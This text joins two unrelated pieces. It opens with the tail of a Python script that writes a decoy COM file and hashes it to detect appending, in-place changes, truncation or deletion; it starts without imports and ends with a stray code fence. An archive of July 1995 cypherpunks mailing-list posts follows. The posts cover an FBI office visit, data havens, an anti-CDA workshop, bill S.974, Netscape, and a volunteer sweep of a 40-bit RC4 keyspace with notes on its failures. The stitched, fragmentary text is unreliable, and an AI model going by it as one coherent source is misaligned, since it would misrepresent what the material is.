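EXIT_STUB = b"\xcd\x20"
BAIT_SIZE = 64 * 1024


def sha256_of(path, limit=None):
    """Hash the whole file, or only its first `limit` bytes."""
    h = hashlib.sha256()
    remaining = limit
    with open(path, "rb") as f:
        while True:
            want = 8192 if remaining is None else min(8192, remaining)
            if want == 0:
                break
            chunk = f.read(want)
            if not chunk:
                break
            h.update(chunk)
            if remaining is not None:
                remaining -= len(chunk)
    return h.hexdigest()


def create_bait(path, size=BAIT_SIZE):
    """Write the decoy and return its baseline record (size and digest)."""
    with open(path, "wb") as f:
        f.write(EXIT_STUB + b"\x00" * (size - len(EXIT_STUB)))
    return {"size": size, "sha256": sha256_of(path)}


def save_baseline(record, baseline_path):
    with open(baseline_path, "w") as f:
        json.dump(record, f)


def load_baseline(baseline_path):
    with open(baseline_path) as f:
        return json.load(f)


def check_bait(path, baseline):
    """Compare the decoy with its baseline and say how it differs."""
    if not os.path.exists(path):
        return "missing"
    size = os.path.getsize(path)
    if size == baseline["size"]:
        same = sha256_of(path) == baseline["sha256"]
        return "clean" if same else "modified-in-place"
    if size < baseline["size"]:
        return "truncated"
    # The file grew. If its first baseline-size bytes still hash to the
    # baseline digest, something was added after the original contents.
    if sha256_of(path, limit=baseline["size"]) == baseline["sha256"]:
        return "appended"
    return "grown-and-rewritten"


def demo():
    """Run four daily checks against constructed changes to the decoy."""
    results = {}
    with tempfile.TemporaryDirectory() as d:
        bait = os.path.join(d, "BAIT.COM")
        baseline_file = os.path.join(d, "baseline.json")
        save_baseline(create_bait(bait), baseline_file)
        baseline = load_baseline(baseline_file)

        results["day1"] = check_bait(bait, baseline)      # untouched

        with open(bait, "ab") as f:                       # constructed change
            f.write(b"constructed tail bytes")
        results["day2"] = check_bait(bait, baseline)

        create_bait(bait)                                 # restore the decoy
        with open(bait, "r+b") as f:                      # same size, new bytes
            f.write(b"changed")
        results["day3"] = check_bait(bait, baseline)

        os.remove(bait)
        results["day4"] = check_bait(bait, baseline)
    return results


if __name__ == "__main__":
    for day, status in demo().items():
        print(day, status)
```
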





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Gate <gate@id.WING.NET>
Date: Wed, 19 Jul 95 14:51:12 PDT
To: snet-l@world.std.com
Subject: Investigate Your Federal Building :)
Message-ID: <Pine.3.89.9507191717.A8562-0100000@dialin1.wing.net>
MIME-Version: 1.0
Content-Type: text/plain


Had problems with the original transmission...

21:22 EST
July 17th, 1995
New Haven, CT

Day One, Investigation Begins.

	Of course, I've been researching THE FACTS all my life, but never 
before have I gone to the FBI to ask for information.

	Also of course, they gave me none, or practically none, just this:

	(202) 324-3000. Can anyone guess? FBIHQ it says on the yellow 
post-it note. That's all she could give me.

	I have been incredibly scared these last couple of days, 
wondering exactly what I was doing, but I feel better this evening. Just 
going down to the Federal Building and poking around asking questions has 
not gotten me killed, and I don't think it will. Check.

	In a recent post to this list I said I was going to go to the 
Federal Building here in New Haven to begin a local investigation of 
Federal Events.

	So I put on my coat and tie, washed up a little (long-hair and 
beard couldn't be controlled, will not cut) and started walking, stopping 
off at Kinko's Copies to make a free local phone call to one of my 
partners and grab some note paper for the session. Then on across the 
green towards the courthouse, town hall and on Orange Street, the Robert 
N. Giaimo (sp) Federal Building.

	Of course, I'd been there before, to the post office, and it was 
always a rather non-descript affair. But now I was looking for something, 
and though I didn't find what I was looking for, I did find out a lot. 
A lot of it was disturbing, a lot of it was funny, and a lot of it was 
encouraging, especially the print of the original Declaration and 
Constitution/Bill of Rights, as well as the posted Code of Ethics for 
Government Service, Public Law 96-303, passed unanimously in Congress on 
June 27, 1980, signed by the President (Carter?) on July 3, 1980:

	Article One of Ten: "Put loyalty to the highest moral principles 
and to country above loyalty to persons, party or Government department." 

	No problem, I thought, I'll keep that in mind.

	Article 9: "Expose corruption wherever discovered."

	Whoa, that's a tough one, where are you going to find corruption 
in the United States of America?

Article 11: "Uphold the Constitution, laws and regulations of the United 
States and all governments therein and never be a party to their evasion."

	Well, the Constitution I can uphold, as it upholds me, but I 
don't know about all the other laws and regulations...I'm not sure 
everything signed since 1776 passes my muster. You?

	But though I had been to the Federal Building several times 
previously, I wasn't ready for what I encountered this time, as it had 
never before been present: heavy security presence. No secret service 
types, just rent-a-cops with a metal detector and baggage x-ray device. 
But they were bustling, somewhat loud, and definitely a presence.

	A humorous note: Usually the electro-magnetic energy that I 
generate because of meditation and honest emotional presence is enough to 
kick the metal detectors, but I thought if I took my belt off, I could 
get through. No such luck, and when I took my belt off, my pants, which 
were bought for my bigger brother, started to fall off. I don't wear 
underwear either, so I ended up walking through security holding my 
breeches up by hand. I thought, mmm the joy of security...of course, it 
was *my* costume (cover) that was falling apart, but I got back together 
without real embarrassment.

	That's when I started to look around the building lobby. First I 
checked the directory. Yup, there it was, FBI, fifth floor, right 
underneath the penthouse cafe. BATF on the second floor, IRS third. 
Department of Protective Service (SS) first floor, though I saw no 
evidence of their lair or personnel. Bill Clinton and Al Gore on the 
wall, of course...Recycling bins for paper, cans, bottles and something 
else, perhaps newspapers. Nice touch I thought, it would be nice to see 
more of those.

	I wandered over to the bulletin board: 

	Arson informants offered rewards
$100,000 to $250,000 rewards offered to informers leading to convictions 
of international terrorists - mostly airplane and boat hijackers.
The Code of Ethics for Government Service as mentioned above.
Help for choking victims...

(At this time, I was rushed by the closing of the computer center. The 
facts are clear though...)

	Anyway, on to greater heights...
	Elevator, fifth floor, get in, man there, looks like FBI, look at 
numbers in elevator, 5 already lit. A real live FBI agent and I in the 
elevator together, wow. Day already made, still only ten o'clock or so. 
Get off 5th floor. Man goes one way, I go another, meet another real live 
FBI guy,

	 "Where's the receptionist?" 

	"Through that door" came the warm reply from a brown-suited man
with a pock-marked face. Hmm, definitely FBI. 

	Into FBI visitor center, one small room, bulletproof glass, Time 
magazines, American Flag with gold tassels in corner, photos of Agents, 
woman behind the counter:

	"Uh, I'm something of a freelance reporter for Citizen's Television
and Internet newsgroups, and I'd like to know if you can confirm whether
or not someone worked for the FBI..."
	Polite no from FBI woman.
	"Is there a public information office?"
	No, then checks mind, goes to back to talk with all male 
contingent, at least seven agents in back room, including the one I saw 
on the elevator, all are rustled into alert by the inquiry from CTV 
producer and Searchnet Reporter. I can just hear them saying, by gosh 
they were right, the Internet really is spawning investigators...
	
	Then all I get back is the phone number, but it was a lot of fun. 
	
	Down to the BATF? nah, enough for the day.
	
	Thoughts on the way to the library...
	
	Next time, maybe I'll deliver a message. Gotta run, Lee.

____________________________|||||||||||||||||||||______________________________
		 R. Leland Lehrman@The Gate, New Haven, CT.     	    
		    http://id.wing.net/~gate/gate.html
	  God, Art, Technology and Ecology Research and Development
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>Do you love the Mother?>>>>>>>>>>>>>>>>>>>>>>>>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@escape.com>
Date: Wed, 19 Jul 95 15:06:39 PDT
To: Jon Lasser <jlasser@rwd.goucher.edu>
Subject: Re: Anti-Electronic Racketeering Act of 1995 (fwd)
In-Reply-To: <Pine.SUN.3.91.950713175807.25319A-100000@rwd.goucher.edu>
Message-ID: <Pine.BSD/.3.91.950719174435.21971F-100000@escape.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 13 Jul 1995, Jon Lasser wrote:

> How about "not respecting international copyright law, and not having 
> extradition treaties with the US" ... set up a data haven, we now know 
> why we need it soon... charge by the Kbyte, automate the billing, and relax.

Seriously bad for my financial health.  I write code for a living (though 
I'm a Netware LAN Admin in this incarnation of a job.)  Going somewhere 
where I can't make money writing code because 10 billion folks will have 
it after one pays is my idea of jumping out of the microwave oven into 
the boiling lobster stew.  :-)

If such systems would be maintenance free, it would be cool going around 
place to place installing data heaven servers all over the place.

Hell a 1Gb hard drive is only $350 or so.  A cheap XT, or lap top hooked 
up to such a drive, say 4Mb of RAM and a 28.8Kbps modem would be good enough.
Say some junky assed machine no more than $500 a pop...

I would guess we could get a small enough package to hide in say... under 
the subway tunnels, or in the sewer system, and hook'em up to existing 
power lines....  Now if we could hook'em up to a phone line easily, it 
would be a great thing to have.  But how do you hook into the phone line 
without the local MaBell getting interested?

Enough of these things hooked up all over the place would be cool.  
Everyone can ftp to the server, write or read, but nobody can delete.  
When the drive is full, the server goes read only.   Instant (free) data 
heaven.  Get a few million of these up, and hey, you've got instant, 
unstoppable info servers.  Very hard for any government to catch all of these.

On the other end of el-spectrum d'data heaven is the pay service.  You 
upload, you pay $5 a meg, I burn your megs on the CD.  You want the data 
back, you pay me $50 a meg and I make it available again.  :-) You'll be 
rolling in cash in no time.  I don't need to know who you are or what 
files you sent me.  Just tell me the date and time stamp of the file my 
server got your file and after I get the $50, you get to download the file.

Pay me in cash, e-cash, or no-name money-orders. :-)

Excellent business, no?  Hell, you could probably set something like this 
up in the USA right now...  Even more easily with a 1-900-$5/minute number.
As long as what you send me is something I can't see, I don't have any 
risk and neither do you.  Or you can snail mail me a 1.44Mb floppy with a 
special file name and I'll take the post_mark date and the file name and 
your $5 and burn it on the CD.

Expensive enough to keep pirates away, cheap enough to make corporate 
data worth backing up remotely.

Cost: ~$10K or so...

 Good pentium server running Linux $2K, 28.8Kbps modems ~$220
 each, need no more than 2Gb of hard drive space... (650 of which you set 
aside for the CD burning.)
 CD Burner ~$1700.
 blank CD's for $8 a piece in volume, etc.

 Good sized data-grade fire proof safe $????

You can hire high school kids to burn the CD's in or your relatives, or 
do it yourself.  Very nice setup.

=================================================================93=======
 + ^ + |  Ray Arachelian | Amerika: The land of the Freeh. | \-_    _-/  |
  \|/  |sunder@escape.com| Where day by day, yet another   |  \  --  /   |
<--+-->|                 | Constitutional right vanishes.  |6 _\-  -/_  6|
  /|\  |    Just Say     |                                 |----\  /---- | 
 + v + | "No" to the NSA!| Jail the censor, not the author!|     \/      |
=======/---------------------------------------------------------VI------/
      /  I watched and weeped as the Exon bill passed, knowing that yet /
     / another freedom vanished before my eyes.  How soon before we see/
    /a full scale dictatorship in the name of decency? While the rest /
   /of_the_world_fights_FOR_freedom,_our_gov'ment_fights_our_freedom_/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@escape.com>
Date: Wed, 19 Jul 95 15:28:04 PDT
To: cypherpunks <cypherpunks@toad.com>
Subject: EVENT: NY-only, non-NY folks ignore (fwd)
Message-ID: <Pine.BSD/.3.91.950719182104.21971L-100000@escape.com>
MIME-Version: 1.0
Content-Type: text/plain




=================================================================93=======
 + ^ + |  Ray Arachelian | Amerika: The land of the Freeh. | \-_    _-/  |
  \|/  |sunder@escape.com| Where day by day, yet another   |  \  --  /   |
<--+-->|                 | Constitutional right vanishes.  |6 _\-  -/_  6|
  /|\  |    Just Say     |                                 |----\  /---- | 
 + v + | "No" to the NSA!| Jail the censor, not the author!|     \/      |
=======/---------------------------------------------------------VI------/
      /  I watched and weeped as the Exon bill passed, knowing that yet /
     / another freedom vanished before my eyes.  How soon before we see/
    /a full scale dictatorship in the name of decency? While the rest /
   /of_the_world_fights_FOR_freedom,_our_gov'ment_fights_our_freedom_/

---------- Forwarded message ----------
Date: Tue, 18 Jul 1995 01:12:41 -0400 (EDT)
From: She Devil With A Modem! <redsonja@computel.com>
To: sunder@escape.com
Subject: EVENT: NY-only, non-NY folks ignore (fwd)

Also Sprach Shabbir J. Safdar:
>From shabbir@panix.com Mon Jul 17 23:51:37 1995
Date: Mon, 17 Jul 1995 23:45:32 -0400
From: "Shabbir J. Safdar" <shabbir@panix.com>
Message-Id: <199507180345.XAA05923@panix3.panix.com>
To: stop314@panix.com
Subject: EVENT: NY-only, non-NY folks ignore

======================================================================

	Campaign to stop the 1995 Communications Decency Act

		  	FREE NEW YORK WORKSHOP

	    We encourage you to forward this to friends
	     DO NOT REDISTRIBUTE AFTER July 22, 1995

______________________________________________________________________
WORKSHOP DETAILS

What: 	A free workshop on current online censorship legislation and
      	the viable alternatives.
When: 	Saturday July 22nd, 1-4pm
Where: 	ACLU offices at Times Sq (132 West 43rd St at 6th Ave)
Who:	Everyone (teachers, librarians, businesses, everyone!)
Agenda:	
  Crash Course on the First Amendment and the New Censorship Legislation 
  Questions and Answers About How the CDA Affects You and Your Business 
  How to Lobby Your Representative 
  Plans for the New York Lobby Day Against the CDA:  Wednesday, July 26th 

______________________________________________________________________
WHY YOU SHOULD ATTEND THE WORKSHOP

Are you interested in seeing our government become less intrusive, not
larger, and less involved in personal decisions about what you read?

Do you believe that Constitutionally-protected speech should not be
regulated by the FCC (or any other Federal agency)?

Do you believe that computer networks are a tremendously powerful tool
for giving many more people in our society a voice, bypassing traditional
forms of media?

If you find the above three questions compelling, you should be
concerned about the 1995 Communications Decency Act (CDA).  Having
already passed the Senate, the CDA is headed for the House and has
favorable odds of passing there as well if nothing is done.

The CDA was passed by the Senate 84-16.  It was voted on by many
legislators who not only never use a computer, but have never read
email, logged onto a BBS, read Usenet news, or seen a Web page.  They
were simply voting with their gut reaction, unaware that they were
disastrously affecting the future of American expression and the
most explosive industry seen in the last ten years.

It *doesn't* have to be that way.  We as New Yorkers can't expect our
elected officials to vote out of a vacuum.  We need to tell our
Representatives that online systems are a new medium, not the same as a
telephone, nor the same as television.  They need to understand that
the Internet and bulletin boards aren't simply Dial-A-Porn lines, or
adult cable channels.

However they won't come to these conclusions themselves; they need your
help.  Come to this free workshop and learn what you can do to help
ensure that online communication isn't restricted unreasonably.

_______________________________________________________________________
SUPPORTING ORGANIZATIONS

American Civil Liberties Union, College Art Association, Creative
Coalition, Feminists for Free Expression, and the Voters
Telecommunications Watch 

_______________________________________________________________________
FOR MORE INFORMATION

For more information about the CDA Workshop on July 22nd, contact: 
 
  Shabbir Safdar, Voters Telecomm Watch 
      Email: vtw@vtw.org
      (718) 596-7234
  Ann Beeson, American Civil Liberties Union 
      Email: beeson@aclu.org 
      (212) 944-9800 x788 

For more information about the CDA, see:
  
Web Sites
        URL:http://www.panix.com/vtw/exon/

Gopher Archives:
        URL:gopher://gopher.panix.com/11/vtw/exon

Email:
        vtw@vtw.org (put "send cdafaq" in the subject line)

________________________________________________________________________
LIST OF PARTICIPATING ORGANIZATIONS

In order to use the net more effectively, several organizations have
joined forces on a single Congressional net campaign to stop the
Communications Decency Act.


American Civil Liberties Union * American Communication Association *
American Council for the Arts * Arts & Technology Society * Association
of Alternative Newsweeklies * biancaTroll productions * Californians
Against Censorship Together * Center For Democracy And Technology *
Centre for Democratic Communications * Center for Public Representation
* Citizen's Voice - New Zealand * Computer Communicators Association *
Computel Network Services * Computer Professionals for Social
Responsibility * Cross Connection * Cyber-Rights Campaign * CyberQueer
Lounge * Dutch Digital Citizens' Movement * Electronic Frontier Canada
* Electronic Frontier Foundation * Electronic Frontier Foundation -
Austin * Electronic Frontiers Australia * Electronic Frontiers Houston
* Electronic Frontiers New Hampshire * Electronic Privacy Information
Center * Feminists For Free Expression * First Amendment Teach-In *
Florida Coalition Against Censorship * FranceCom, Inc. Web Advertising
Services * Friendly Anti-Censorship Taskforce for Students * Hands Off!
The Net * Human Rights Watch * Inland Book Company * Inner Circle
Technologies, Inc. * Inst. for Global Communications * Internet
On-Ramp, Inc. * Joint Artists' and Music Promotions Political Action
Committee * The Libertarian Party * Marijuana Policy Project *
Metropolitan Data Networks Ltd. * MindVox * National Bicycle Greenway *
National Campaign for Freedom of Expression * National Coalition
Against Censorship * National Gay and Lesbian Task Force * National
Public Telecomputing Network * National Writers Union * Oregon Coast
RISC * Panix Public Access Internet * People for the American Way *
Rock Out Censorship * Society for Electronic Access * The Thing
International BBS Network * The WELL * Voters Telecommunications Watch

(Note: All 'Electronic Frontier' organizations are independent entities,
 not EFF chapters or divisions.)

________________________________________________________________________
	End Alert
========================================================================


-- 
                                    ()()()()()  
   All that matters is that  ]{      |BTCOMH|-| Eileen Tronolone
 -===========================]*\\\{O | (tm) | | System Administrator
   two stood against many... ]{      |______|-/ redsonja@computel.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shabbir@panix.com
Date: Wed, 19 Jul 95 15:27:23 PDT
To: Paul Elliott <paul.elliott@hrnowl.lonestar.org>
Subject: Re: Why no action alert, coalition opposing S. 974?
In-Reply-To: <300d66d0.flight@flight.hrnowl.lonestar.org>
Message-ID: <199507192226.SAA10293@panix4.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



S 974 is a silly bill.  It's like someone went around and made a list
of all the things that would irk us and then wrote legislation
around it.

However this bill isn't immediately going anywhere, and there's more
dangerous legislation on the floor that is looking a lot like a loaded
gun.

VTW is tracking this bill and will put out alerts on it if it becomes
a more valid threat.  However until then we'll not try to divide the
forces of the net on bills that aren't yet a serious threat.

Read the bill, familiarize yourself with the analyses, but let's not
go running off every time some DC bozo writes a terrible bill.  Especially
when there isn't even a subcommittee hearing scheduled yet.

Let's try and do *one thing* at a time.

-Shabbir

In message <300d66d0.flight@flight.hrnowl.lonestar.org>, Paul Elliott writes:
>-----BEGIN PGP SIGNED MESSAGE-----
>
>I have read the EFF analysis of Senate bill 974, which is designed to
>inhibit encryption on Networks. I think that it is a thoughtful document
>but I am concerned that there has been no action alert produced to tell
>people the most effective way to oppose this horrible Bill. People
>who are concerned about the bill need to know what Senators could most
>profitably be contacted. Also why has no coalition been formed to oppose
>this bill? I am aware that many people are busy opposing S314, but
>S974 is equally terrible as it attempts to suppress free expression.
>
>I could try to produce an action alert myself, but I would probably make
>errors as I am not up on the legal subtleties and the intricacies of
>Congress. Could some of the savvy people please write an action alert?
>Otherwise I will be forced to take a stab at it.
>
>- -- 
>Paul Elliott                                  Telephone: 1-713-781-4543
>Paul.Elliott@hrnowl.lonestar.org              Address:   3987 South Gessner #224
>                                              Houston Texas 77063
>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@sensemedia.net (Timothy C. May)
Date: Wed, 19 Jul 95 18:56:27 PDT
To: Ray Arachelian <jlasser@rwd.goucher.edu>
Subject: Data Havens and Intellectual Property
Message-ID: <ac330394020210046d40@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



Ahh, a meaty subject at long last!

At 9:59 PM 7/19/95, Ray Arachelian wrote:
>On Thu, 13 Jul 1995, Jon Lasser wrote:
>
>> How about "not respecting international copyright law, and not having
>> extradition treaties with the US" ... set up a data haven, we now know
>> why we need it soon... charge by the Kbyte, automate the billing, and relax.
>
>Seriously bad for my financial health.  I write code for a living (though
>I'm a Netware LAN Admin in this incarnation of a job.)  Going somewhere
>where I can't make money writing code because 10 billion folks will have
>it after one pays is my idea of jumping out of the microwave oven into
>the boiling lobster stew.  :-)

Agreed, things may be rough for the folks profiting from the current
intellectual property laws. But many nations don't agree with our notions
of what is one's intellectual property.

("Galombosians" believe one's _ideas_ are one's property, subject to
collection of fees. "You mentioned "remailers"...please remit $1.33
to....")

>If such systems would be maintenance free, it would be cool going around
>place to place installing data heaven servers all over the place.
>
>Hell a 1Gb hard drive is only $350 or so.  A cheap XT, or lap top hooked
>up to such a drive, say 4Mb of RAM and a 28.8Kbps modem would be good enough.
>Say some junky assed machine no more than $500 a pop...

I think you're making the point: machines on the Net are getting much, much
cheaper, which will make "Mom and Pop remailers" much more common.

Importantly, these remailers will be common--someday, if not this year--in
non-U.S. jurisdictions.

The growth of Net and Web services has been astounding, even to me (someone
whose first Arpanet account was in 1973). This will put Cypherpunks
services into many more places.

--Tim May

..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay@sensemedia.net   | anonymous networks, digital pseudonyms, zero
408-728-0152           | knowledge, reputations, information markets,
Corralitos, CA         | black markets, collapse of governments.
Higher Power: 2^756839 | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@sensemedia.net (Timothy C. May)
Date: Wed, 19 Jul 95 19:10:06 PDT
To: cypherpunks@toad.com
Subject: Netscape the Big Win
Message-ID: <ac330625030210040787@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



Here is my experience with the last month of heavily using Netscape (1.1N),
after several years of using a mix of Unix-based tools on a Unix shell
account at Netcom (and several years of using Portal before that, beginning
in 1988).

(And intermittent Net use from 1973, when I had a very primitive account in
college at UC Santa Barbara, on the "Arpanet," to the mid-80s, when I had
various accounts while still at Intel.)

* I use Netscape to read News.

* I use Netscape to access the Web.

* I still use Eudora to send and receive Mail. (Netscape can currently send
mail, but not receive it. This is likely to change soon.)

Why is this important?

I believe, quite strongly, that we are headed toward a situation where the
large majority of Net/Web users are using some variant of Netscape, or
Mosaic/MacWeb/etc. (but probably Netscape, for various reasons).

Integration of crypto into Netscape is thus the Big Win.

I felt this was the case as far back as last fall, but my recent
experiences tell me this is more important than ever. Integration of PGP
and other crypto routines into Tin, Pine, Elm, Joe, Emacs, etc., is just
not as important.

IBM just paid nearly $3 billion for Lotus, largely for the "common
platform" of Lotus Notes. I believe Netscape is an even more important
common platform, and will displace Notes.

I have been asked many times by various of you about investments, as I've
been making my living the past decade through investments. The message here
is my strongest statement about what to invest in.

(I'm not saying one has to stand in line for the August IPO of Netscape
Communications, but the overall market will favor the Web browsers,
especially Netscape.)

The relevance for Cypherpunks interested in writing code is that, in my
carefully considered opinion, writing for Netscape and other Web browsers
is the Big Win. Even over Windows (except Windows browsers, of course).

--Tim May

..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay@sensemedia.net   | anonymous networks, digital pseudonyms, zero
408-728-0152           | knowledge, reputations, information markets,
Corralitos, CA         | black markets, collapse of governments.
Higher Power: 2^756839 | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@dcs.exeter.ac.uk
Date: Wed, 19 Jul 95 11:32:29 PDT
To: cypherpunks@toad.com
Subject: ANNOUNCE: bruteRC4, 40 bits all swept
Message-ID: <29518.9507191827@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



Well we have demonstrated that 40 bit RC4 can be brute forced in
around a week's compute time.

(We've also learned a list of things to fix for the next attempt as no
key was forthcoming :-|, details on why not and what is being fixed to
ensure this doesn't happen with a future RC4-40 or with the coming
40+88 SSL brute forcing are given below)

The problems are logistic, human error, etc, from a compute time point
of view it *really* was a full sweep of a 40 bit keyspace.  And on
average you would expect to sweep in half this time.

The bulk of the work was done in under one week's compute time, but
problems with people forgetting to acknowledge what they swept, meant
that 3 or 4 people swept the remaining key space over, which slowed
down this announce.

Here's the hall of fame, for bits/percentage swept per identifiable
contributor (this is tallied by acknowledgement, if you swept but did
not acknowledge quickly enough or at all, that work won't show as the
last keyspace was re-swept to hurry things up.  The first
acknowledgement to be received counts, the rest get ignored).

bits/40   percent  contributor
----------------------------------------------------------------------
37.2 bits (14.063%) Jon Shekter <jshekter@alias.com>
36.4 bits (8.081%) Alvin Brattli <alvin@phys.uit.no>
36.1 bits (6.909%) anonymous
36.1 bits (6.836%) Dan Bailey <merzbow@ibm.net>
36.1 bits (6.812%) Piete Brooks <Piete.Brooks@cl.cam.ac.uk>
35.6 bits (4.688%) Loren Rittle <rittle@comm.mot.com>
35.6 bits (4.663%) Adam Back <aba@dcs.ex.ac.uk>
35.4 bits (4.102%) Eric Young <eay@mincom.oz.au>
35.4 bits (4.004%) Fred <admin@dcwill.com>
35.3 bits (3.809%) Martin Hamilton <martin@mrrl.lut.ac.uk>
35.2 bits (3.711%) Kevin Wang <kwang@blackbox.punk.net>
35.0 bits (3.125%) Richard Martin <rmartin@alias.com>
34.7 bits (2.490%) Dan Oelke <droelke@aud.alcatel.com>
34.3 bits (1.978%) Branko Lankester
34.0 bits (1.611%) Simon McAuliffe <sai@comp.vuw.ac.nz>
34.0 bits (1.562%) Mike Gebis <m-gebis@uiuc.edu>
33.8 bits (1.392%) Pat Finerty <zinc@zifi.genetics.utah.edu>
33.8 bits (1.367%) <hodgeman@csd.uwm.edu>
33.5 bits (1.123%) Panu Rissanen <Panu.Rissanen@lut.fi>
33.4 bits (1.001%) Paul Bell <pjb@23kgroup.com>
33.3 bits (0.977%) Matt Thomlinson <phantom@u.washington.edu>
33.3 bits (0.952%) Will Kinney <kinney@colorado.edu>
33.2 bits (0.903%) T J Hardin <hardin@cyberspace.com>
33.2 bits (0.879%) Patrick May <pjm@ionia.engr.sgi.com>
32.8 bits (0.684%) Stephane Bortzmeyer <bortzmeyer@cnam.fr>
32.7 bits (0.635%) anonner
32.5 bits (0.537%) Matt Pauker <mpauker@peganet.com>
32.5 bits (0.537%) Ed Kern <ejk@digex.net>
32.5 bits (0.537%) Andrew Kuchling <andrewk@cst.ca>
32.5 bits (0.537%) <rmtodd@mailhost.ecn.uoknor.edu>
32.4 bits (0.513%) <somogyi@digmedia.com>
32.3 bits (0.488%) Jon Baber <jbaber@mi.leeds.ac.uk>
32.2 bits (0.439%) Bryce Boland <bryce@cybernet.co.nz>
32.0 bits (0.391%) Thad Beier <thad@thresher.uucp.netcom.com>
32.0 bits (0.391%) Per Stoltze <stoltze@fysik.dtu.dk>
32.0 bits (0.391%) Glenn Powers <gpowers@bradley.edu>
32.0 bits (0.391%) <janzen@idacom.hp.com>
31.8 bits (0.342%) Mike Bailey <bailey@computek.net>
31.7 bits (0.317%) Robert Hayden <hayden@krypton.mankato.msus.edu>
31.7 bits (0.317%) John Limpert <johnl@radix.net>
31.6 bits (0.293%) Opus
31.6 bits (0.293%) Mark Rogaski <rogaski@phobos.lib.iup.edu>
31.6 bits (0.293%) <josh@silicon.net>
31.5 bits (0.269%) Michael Bacon <mbacon@dfw.net>
31.3 bits (0.244%) Jim Gillogly <jim@acm.org>
31.3 bits (0.244%) David Zuhn <zoo@armadillo.com>
31.2 bits (0.220%) Russell Ross <rross@sci.dixie.edu>
31.2 bits (0.220%) Don Kitchen <don@cs.byu.edu>
31.0 bits (0.195%) Scott Renfro <csylvix!srenfro@cuok.cameron.edu>
31.0 bits (0.195%) Planar <Damien.Doligez@inria.fr>
30.8 bits (0.171%) Matt <panzer@dhp.com>
30.8 bits (0.171%) Joe Thomas <jthomas@access.digex.net>
30.8 bits (0.171%) Adrian Thomson <a.thomson@nexor.co.uk>
30.6 bits (0.146%) Michael Axelrod <mja@cacs.usl.edu>
30.6 bits (0.146%) Mark Eichin <mark@kitten.gen.ma.us>
30.6 bits (0.146%) Jason Burrell <jburrell@crl.com>
30.3 bits (0.122%) Will Ware <wware@world.std.com>
30.3 bits (0.122%) Kevin Maher <kmaher@ucsd.edu>
30.3 bits (0.122%) Josh Sled <jsled@cello.gina.calstate.edu>
30.3 bits (0.122%) Checkered Daemon <cdaemon@goblin.punk.net>
30.3 bits (0.122%) Andrew Roos <andrewr@realtime.co.za>
30.0 bits (0.098%) Jason Weisberger <jweis@primenet.com>
30.0 bits (0.098%) <pdlamb@iquest.com>
30.0 bits (0.098%) <matt@comp.vuw.ac.nz>
29.6 bits (0.073%) Mark Grant <mark@unicorn.com>
29.6 bits (0.073%) Lou Poppler <lwp@mail.msen.com>
29.6 bits (0.073%) Edwin de Graaf <graaf@iaehv.nl>
29.6 bits (0.073%) David Conrad <conrad@detroit.freenet.org>
29.6 bits (0.073%) Dan Tauber <dat@netcom.com>
29.6 bits (0.073%) Alexandra Griffin <acg@kzin.cen.ufl.edu>
29.6 bits (0.073%) <pkronenw@erc.cat.syr.edu>
29.6 bits (0.073%) <ghazelwo@cs.oberlin.edu>
29.0 bits (0.049%) Stuart <stu@nemesis.wimsey.com>
29.0 bits (0.049%) Pekka Riiali <Pekka.Riiali@lut.fi>
29.0 bits (0.049%) Jeffrey Ollie <jeffo@noc.netins.net>
29.0 bits (0.049%) James Hightower <jamesh@netcom.com>
29.0 bits (0.049%) Hadmut Danisch <danisch@ira.uka.de>
29.0 bits (0.049%) Bob Snyder <rsnyder@janet.advsys.com>
29.0 bits (0.049%) <stevet@smeg.net4.io.org>
28.0 bits (0.024%) Sang Hahn <sghahn@math1.kaist.ac.kr>
28.0 bits (0.024%) Roy Silvernail <roy@cybrspc.mn.org>
28.0 bits (0.024%) Ollivier Robert <roberto@keltia.freenix.fr>
28.0 bits (0.024%) Lucky Green <shamrock@netcom.com>
28.0 bits (0.024%) L Futplex McCarthy <futplex@pseudonym.com>
28.0 bits (0.024%) Jeff Licquia <jalicqui@prairienet.org>
28.0 bits (0.024%) J Francois <frenchie@magus.dgsys.com>
28.0 bits (0.024%) Brian LaMacchia <bal@mit.edu>
28.0 bits (0.024%) Andy Brown <a.brown@nexor.co.uk>
28.0 bits (0.024%) Adam Morrison <adam@math.tau.ac.il>
28.0 bits (0.024%) <mikew@nersc.gov>
----------------------------------------------------------------------
40.0 bits (100.000%) 89 cpunks + x * anonners in 1 week's compute


Report is on the brute-rc4.html page also:

	http://dcs.ex.ac.uk/~aba/brute-rc4.html


Problems.
---------

But, briefly these are the things which may be responsible for the
failure to find a key:

a) We weren't sure if we had a known plaintext / ciphertext pair

   This was due to lack of Microsoft Access specs; this was known from
   the beginning, but we thought we'd try it and see.

b) Eeek! There was a bug in bruterc4.c for some time which affected
   Alphas, and possibly other BSD machines.  This meant keyspace 
   wasn't being searched when the -v option was used.

c) Some people reported that their browser / uuencode software
   combination meant that cutting and pasting of the uuencode plain
   text and cipher text files was silently failing due to extra spaces
   inserted by a flawed pasting operation.

d) Human error - it is possible that some keys were unswept - by 
   accident.

e) Malicious humans - we don't know, but think this was not a problem.


Solutions.
----------

Proposed solutions for future brute forcing efforts (such as the
upcoming SSL effort), for respective points above:


a) Need better spec of MA, or more experimentation / reverse
   engineering.

   For SSL this is not a problem as the SSL specs are openly available
   and very detailed.

b) Write bug free software :-)  Test more rigorously on multiple Unixes
   and architectures with a brief test run.

